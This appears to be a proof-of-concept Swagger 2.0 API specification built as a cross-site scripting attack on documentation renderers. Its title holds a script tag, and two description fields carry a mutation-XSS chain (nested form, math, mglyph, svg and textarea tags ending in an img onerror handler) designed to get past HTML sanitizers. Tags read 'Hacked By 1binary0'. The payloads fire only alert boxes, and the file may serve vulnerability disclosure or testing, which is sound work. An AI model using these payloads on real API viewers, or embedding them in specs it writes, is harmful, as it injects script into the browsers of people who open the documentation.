---
swagger: '2.0'
info:
  title: Classic API Resource Documentation<script language=\"javascript\">alert('1')</script>",
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(123123) src>"></form>

  version: production
basePath: https://afine.com
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/hacked":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - Hacked By 1binary0
      operationId: findAccounts
      summary: this is example text
  "/malformed_brequest_by_1binary0":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(123123) src>"></form>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      
      - Hacked By 1binary0
      operationId: afine
      summary: afine
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - afine
      operationId: some_operation
      summary: this is example text
